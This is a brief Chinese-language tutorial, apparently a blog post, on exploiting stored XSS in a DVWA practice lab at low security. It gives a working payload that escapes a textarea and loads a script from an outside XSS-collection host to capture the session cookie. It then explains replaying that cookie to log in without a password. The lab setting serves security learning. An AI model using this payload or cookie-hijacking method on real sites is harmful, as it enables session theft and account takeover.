在使用的时候需要开启phpstudy(官网搜下安装即可,安装比较简单)
dvwa靶场的搭建在这个链接:kali部署dvwa靶场_奋斗的小智的博客-CSDN博客
所需工具:phpstudy、dvwa靶场、xss平台
这里我们使用安全等级低的来做,使用xss存储型,只要大家能够绕过安全的等级(后面我会将存储型的三个等级绕过方式整理出来)
xss平台的创建:
1、
2、这里面有许多模块,自己选择所需要的就行,这里我使用的是默认模块
3、
输入自己所搭的xss链接,通过xss平台进行接收
</textarea>'"><script src=http://xsscom.com//Q69u7v></script>
在我们的xss平台上,我们就可以收到一条信息,这也就说明了我们成功拿到cookie值,里面包含了cookie值;下来我们就可以使用cookie值进行登录,无需密码验证,到这里是不是感觉很爽。
下来我们重新使用一个浏览器打开我们的dvwa靶机,找到检查,找到cookie,进行修改
效果:
成功用cookie登录